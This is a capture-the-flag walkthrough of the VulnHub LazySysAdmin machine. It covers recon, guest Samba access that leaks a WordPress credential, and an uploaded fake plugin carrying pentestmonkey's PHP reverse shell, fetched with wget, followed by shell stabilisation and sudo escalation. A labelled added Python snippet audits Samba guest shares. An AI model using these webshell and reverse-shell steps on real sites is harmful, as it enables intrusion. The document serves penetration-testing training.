Vulnhub target machine: LazySysAdmin: 1

Introduction

Series: LazySysAdmin (1 machine in this series)
Release date: September 20, 2017
Difficulty: Beginner
Operating environment: VMware Workstation
Goal: Obtain Root permissions
Learning:

  • Sensitive information disclosure through Samba
  • Planting a webshell through WordPress

Target machine address: https://www.vulnhub.com/entry/lazysysadmin-1,205/

Information gathering

Host discovery with netdiscover

sudo netdiscover -i eth0 -r 192.168.229.0/24

Host information detection

Found that SSH is running on port 777.

nmap -p- 192.168.229.144
nmap -p 22,80,139,445,3306,6667 -A 192.168.229.144
nmap -p 22,80,139,445,3306,6667 --script=vuln 192.168.229.144


Testing Samba security

A shared directory with read-only permissions was found, and it accepts a login with an empty password. It contains many files and directories.

smbmap -H 192.168.229.144
smbclient //192.168.229.144/share$

Use get to download the files you are interested in.
A configuration file reveals an account and password: Admin/TogieMYSQL12345^^
There is also another password: 12345
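Seen from the defender's side, the finding above is a share that accepts a guest session and exposes files holding application credentials. The following added example (not part of the original post) audits smb.conf text for that pattern; the sample configuration, the name guest_share_findings and the SENSITIVE_ROOTS list are assumptions made for illustration.

```python
import configparser

# Constructed sample, not the target's real smb.conf: a guest-readable share
# on the web root next to a share that requires a named user.
SAMPLE_SMB_CONF = """
[global]
    map to guest = Bad User

[share$]
    path = /var/www/html/
    guest ok = yes
    read only = yes

[backups]
    path = /srv/backups
    valid users = togie
    guest ok = no
"""

# Assumed directories that tend to hold credentials (wp-config.php and similar).
SENSITIVE_ROOTS = ("/var/www", "/srv/www", "/etc", "/home")
SKIP_SECTIONS = {"global", "printers", "print$"}


def guest_share_findings(text, sensitive_roots=SENSITIVE_ROOTS):
    """Return (share, path, reason) for each share a guest session can open."""
    parser = configparser.ConfigParser(interpolation=None, strict=False)
    # Samba ignores case and spaces in parameter names ("guest ok" == "guestok").
    parser.optionxform = lambda name: name.replace(" ", "").lower()
    # Strip indentation so configparser does not read lines as continuations.
    parser.read_string("\n".join(line.strip() for line in text.splitlines()))
    findings = []
    for share in parser.sections():
        if share.lower() in SKIP_SECTIONS:
            continue
        opts = parser[share]
        guest = opts.get("guestok", opts.get("public", "no")).strip().lower()
        if guest not in {"yes", "true", "1"}:
            continue
        path = opts.get("path", "(unset)").rstrip("/") or "/"
        exposed = any(path == r or path.startswith(r + "/") for r in sensitive_roots)
        reason = "guest access to a sensitive path" if exposed else "guest access"
        findings.append((share, path, reason))
    return findings


if __name__ == "__main__":
    for share, path, reason in guest_share_findings(SAMPLE_SMB_CONF):
        print(f"[!] {share}: {path} ({reason})")
```

Run it against the contents of /etc/samba/smb.conf on a file server; any share reported under a web root should either lose guest access or be moved away from configuration files.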

Logging in to the website

The homepage of the website is a static page with no valuable information.
A simple directory brute-force reveals a WordPress installation:

dirsearch -u http://192.168.229.144/ --full-url -x 404,403

The content on the page keeps telling us that his name is togie, so let's try logging in next.
Access the default admin address: http://192.168.229.144/wordpress/wp-admin
Logging in with Admin/TogieMYSQL12345^^ succeeds.
Attackers often abuse the plugin feature to obtain a reverse shell. The following demonstrates the process of getting a shell through WordPress.

Webshell packaged in a zip archive

  1. Download the reverse shell file

https://pentestmonkey.net/tools/web-shells/php-reverse-shell

wget http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz
gunzip php-reverse-shell-1.0.tar.gz
tar xvf php-reverse-shell-1.0.tar
cp php-reverse-shell-1.0/php-reverse-shell.php ./
vim php-reverse-shell.php
zip sh.zip php-reverse-shell.php

This file also ships with Kali at: /usr/share/webshells/php/php-reverse-shell.php

  2. Edit the file

Set the address and port for the reverse shell.
Edit the header of the fake plugin. This step is optional.

  3. Install the plugin

The page shows that the installation succeeded.

  4. Get a shell

http://192.168.229.144/wordpress/wp-content/plugins/sh/php-reverse-shell.php

Privilege escalation

First stabilize the shell:

python -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm-color

I found that I could switch to the togie user, and then used sudo to escalate privileges.

Origin blog.csdn.net/weixin_44288604/article/details/132410108